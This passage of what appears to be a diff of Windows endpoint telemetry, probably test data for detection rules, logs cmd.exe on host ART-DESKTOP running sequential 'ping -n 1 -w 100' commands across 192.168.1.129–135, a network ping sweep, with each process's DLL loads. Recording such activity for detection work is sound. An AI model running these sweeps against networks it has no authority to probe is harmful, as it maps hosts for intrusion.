"{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607140000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572607300000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "event_type": "process", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572611990000, + "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.129", + "event_type": "process", + "logon_id": 
217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": 
"{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572612140000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "event_type": "process", + "pid": 5976, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572616840000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.130", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7928, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" 
+ }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + 
"pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572616980000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "event_type": "process", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572621990000, + "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.131", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + 
"image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5520, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572622140000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572626830000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.132", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572626970000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + 
"image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572626980000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572631990000, + "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.133", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8060, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572632140000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "event_type": "process", + "pid": 8060, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572636830000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.134", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572636980000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "event_type": "process", + "pid": 7204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572641990000, + "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.135", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": 